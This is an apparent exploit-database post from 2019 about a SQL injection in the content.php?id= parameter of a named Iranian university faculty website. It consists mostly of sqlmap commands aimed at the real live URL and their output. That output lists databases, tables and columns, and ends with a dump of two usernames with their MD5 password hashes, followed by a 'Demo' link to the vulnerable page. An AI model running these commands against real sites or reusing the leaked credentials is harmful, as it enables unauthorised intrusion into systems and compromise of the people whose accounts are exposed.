State University of Shahid Beheshti Iran SQL injection

2019.03.10
Credit: NikbinHK
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: State University of Shahid Beheshti Iran SQL injection # Date: 2019-03-10 # Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin # Vendor Homepage: sbu.ac.ir # Tested on: win,linux ================================================================================= [SQL injection] [+] Method ( GET ) Nullix Security Team of IRan [+] parameter : content.php?id= [+] Directory /fazlali/ [+] Sub Domain : http://facultymembers.sbu.ac.ir/ ================= Mode Hash : MD5 ================= =================================================================================== [+] using sqlmap For Scan root@nikbinhk:~$ : python sqlmap.py -u http://facultymembers.sbu.ac.ir/fazlali/content.php?id=292 --dbs ==================================================================================== Output :‌ Database name : [*] fazlali_dr [*] information_schema ===================================================================================== root@nikbinhk:~$ : python sqlmap.py -u http://facultymembers.sbu.ac.ir/fazlali/content.php?id=292 -D fazlali_dr --tables ===================================================================================== Output :‌ Tables Name : [34 tables] +----------------+ | language | | translate | | user | | albums | | bio | | bmenu | | cat | | comment | | comments | | content | | contents | | gas_id | | images | | introduce | | job | | leaders | | left_adv | | link | | menu | | movie | | news | | newsboard | | poll | | polls | | post | | registers | | right_adv | | tag | | taxi | | top_doc | | top_headbanner | | top_music | | top_slider | | village | +----------------+ ==================================================================================== root@nikbinhk:~$ : python sqlmap.py -u http://facultymembers.sbu.ac.ir/fazlali/content.php?id=292 -D fazlali_dr -T user --columns ==================================================================================== Output :‌ Columns Name : [13 columns] +----------+------------+ | Column | Type | +----------+------------+ | user | tinyint(1) | | admin | tinyint(1) | | content | tinyint(1) | | id | int(11) | | leaders | tinyint(1) | | links | tinyint(1) | | menu | tinyint(1) | | news | tinyint(1) | | password | text | | poll | tinyint(1) | | taxi | tinyint(1) | | template | tinyint(1) | | username | text | +----------+------------+ ===================================================================================== root@nikbinhk:~$ : python sqlmap.py -u http://facultymembers.sbu.ac.ir/fazlali/content.php?id=292 -D fazlali_dr -T user -C username,password --dump all ====================================================================================== +----------+----------------------------------+ | username | password | +----------+----------------------------------+ | fazlali | 580b18faf4d134a063c3596c9946d978 | | ehmo | 8cb8f738bcaddba144eba81fc00f0272 | +----------+----------------------------------+ =============================================================================================== Demo : http://facultymembers.sbu.ac.ir/fazlali/content.php?id=292 =========================================================================================== Tnx TO : NullixTM


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top